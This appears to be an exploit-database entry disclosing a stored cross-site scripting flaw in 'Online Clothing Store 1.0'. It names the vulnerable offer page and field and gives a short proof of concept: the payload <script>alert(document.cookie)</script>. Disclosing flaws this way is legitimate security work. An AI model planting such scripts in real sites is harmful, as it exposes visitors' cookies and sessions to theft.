81205fc37a
8 changes to exploits/shellcodes Online Clothing Store 1.0 - Persistent Cross-Site Scripting i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion Booked Scheduler 2.7.7 - Authenticated Directory Traversal Online Clothing Store 1.0 - 'username' SQL Injection webTareas 2.0.p8 - Arbitrary File Deletion GitLab 12.9.0 - Arbitrary File Read YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection MPC Sharj 3.11.1 - Arbitrary File Download
21 lines
No EOL
778 B
Text
21 lines
No EOL
778 B
Text
# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
|
|
# Date: 2020-05-05
|
|
# Exploit Author: Sushant Kamble
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
|
|
|
|
#Vulnerable Page: Offers.php
|
|
#Parameter Vulnerable: Offer Detail
|
|
|
|
ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS
|
|
|
|
Admin user can add malicious script to offer page.
|
|
when a normal user visit a page. A script gets executed.
|
|
|
|
# Exploit:
|
|
Open offer.php
|
|
Add below script in Offer Detail
|
|
<script>alert(document.cookie)</script>
|
|
Save |